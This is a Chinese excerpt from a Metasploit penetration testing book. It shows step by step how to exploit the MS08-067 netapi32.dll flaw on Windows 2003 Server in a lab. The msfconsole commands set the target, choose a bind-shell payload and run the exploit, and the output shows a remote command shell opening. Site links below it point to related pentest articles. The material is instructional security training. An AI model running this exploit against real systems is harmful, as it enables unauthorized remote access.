《Metasploit渗透测试手册》—第3章3.5节在Windows 2003 Server上进行渗透测试

简介:

本节书摘来自异步社区《Metasploit渗透测试手册》一书中的第3章3.5节在Windows 2003 Server上进行渗透测试,作者【印度】Abhinav Singh,更多章节内容可以访问云栖社区“异步社区”公众号查看。

3.5 在Windows 2003 Server上进行渗透测试
Metasploit渗透测试手册
在上一节中,我们介绍了怎样使用dcom漏洞利用代码,引发Windows目标机器的缓冲区溢出,并成功实现对其进行攻击渗透。本节将介绍一个类似但又不完全相同的环境,Windows 2003 Server是微软应用最广泛的企业级操作系统之一,本节将介绍怎样对其进行攻击渗透,由于打了补丁的Windows 2003 Server中已经不存在dcom漏洞,所以本节中将尝试使用其他漏洞,即netapi32.dll漏洞。首先分析该漏洞的工作过程,然后分析该漏洞成因。

准备
首先启动msfconsole,并对目标进行快速扫描。建议读者执行渗透测试时采用标准的步骤,以便增强理解和掌握。下面的内容和前两节讲述的是相同的,差别在于使用的漏洞利用代码不同。

怎样实现
若要在Windows 2003 Server上执行渗透测试,遵循如下步骤。

(1)首先搜索netapi,列出Metasploit框架中所有与netapi相关的漏洞利用代码。

msf > search netapi
Matching Modules
================
   Name                                   Disclosure Date     Rank    
   ----                                   ---------------     ----       
exploit/windows/smb/ms03_049_netapi     2003-11-11       good
exploit/windows/smb/ms06_040_netapi     2006-08-08       good  
exploit/windows/smb/ms06_070_wkssvc     2006-11-14       manual  
exploit/windows/smb/ms08_067_netapi     2008-10-28       great

从结果可以看到,列出的4个结果中,最后一个漏洞利用代码的评级为great,所以优先使用该漏洞利用代码。

(2)将RHOST设置为Windows 2003 Server目标机器。

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                      yes        The target address
   RPORT    445              yes        Set the SMB service port
   SMBPIPE  BROWSER          yes        The pipe name to use 
(BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.102
RHOST => 192.168.56.102

Id值为0的含义是不需要指定目标操作系统。

(3)完成漏洞利用代码加载后,设置攻击载荷。这里仍然设置tcp_bind攻击载荷,以便获取目标机器的shell,如前面所讨论的。

msf  exploit(ms08_067_netapi) > set payload 
windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf  exploit(ms08_067_netapi) > set LHOST 192.168.56.101
LHOST => 192.168.56.101

漏洞利用代码和攻击载荷都已经设置完毕,最后使用exploit命令并分析该命令的执行结果。

msf  exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 SERVER - Service Pack 2 - lang:English
[*] Selected Target: Windows 2003 Server SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.56.102
[*] Command shell session 1 opened (192.168.56.101:43408 -> 
192.168.56.102:4444) at 2011-11-02 21:25:30 +0530
C:\WINDOWS\system32>

从结果可以看到攻击成功,并建立了到目标主机的shell连接,可以通过命令行访问目标机器。Metasploit在进行渗透攻击测试方面功能强大,在相当大的程度上简化了任务的难度。下面快速浏览本节中漏洞利用代码的工作原理。

怎样工作
该模块利用了Server服务中的漏洞,即netapi32.dll执行路径连接代码中的分析漏洞,在某些操作系统和服务包中,该漏洞可以绕过NX特性。可用于防止Server服务(以及同一进程中的其他服务)崩溃。

本文仅用于学习和交流目的,不代表异步社区观点。非商业转载请注明作译者、出处,并保留本文的原始链接。

相关文章
|
1月前
|
Linux Shell 网络安全
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
73 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
|
1月前
|
安全 Ubuntu Linux
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
52 9
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
|
25天前
|
安全 关系型数据库 MySQL
Windows Server 安装 MySQL 8.0 详细指南
安装 MySQL 需要谨慎,特别注意安全配置和权限管理。根据实际业务需求调整配置,确保数据库的性能和安全。
138 9
|
2月前
|
网络安全 Windows
Windows server 2012R2系统安装远程桌面服务后无法多用户同时登录是什么原因?
【11月更文挑战第15天】本文介绍了在Windows Server 2012 R2中遇到的多用户无法同时登录远程桌面的问题及其解决方法,包括许可模式限制、组策略配置问题、远程桌面服务配置错误以及网络和防火墙问题四个方面的原因分析及对应的解决方案。
162 4
|
2月前
|
监控 安全 网络安全
使用EventLog Analyzer日志分析工具监测 Windows Server 安全威胁
Windows服务器面临多重威胁,包括勒索软件、DoS攻击、内部威胁、恶意软件感染、网络钓鱼、暴力破解、漏洞利用、Web应用攻击及配置错误等。这些威胁严重威胁服务器安全与业务连续性。EventLog Analyzer通过日志管理和威胁分析,有效检测并应对上述威胁,提升服务器安全性,确保服务稳定运行。
|
2月前
|
监控 安全 网络安全
Windows Server管理:配置与管理技巧
Windows Server管理:配置与管理技巧
124 3
|
2月前
|
存储 安全 网络安全
Windows Server 本地安全策略
由于广泛使用及历史上存在的漏洞,Windows服务器成为黑客和恶意行为者的主要攻击目标。这些系统通常存储敏感数据并支持关键服务,因此组织需优先缓解风险,保障业务的完整性和连续性。常见的威胁包括勒索软件、拒绝服务攻击、内部威胁、恶意软件感染等。本地安全策略是Windows操作系统中用于管理计算机本地安全性设置的工具,主要包括用户账户策略、安全选项、安全设置等。实施强大的安全措施,如定期补丁更新、网络分段、入侵检测系统、数据加密等,对于加固Windows服务器至关重要。
101 1
|
3月前
|
边缘计算 安全 网络安全
|
3月前
|
数据安全/隐私保护 Windows
安装 Windows Server 2019
安装 Windows Server 2019
101 1
|
3月前
|
网络协议 Windows
Windows Server 2019 DHCP服务器搭建
Windows Server 2019 DHCP服务器搭建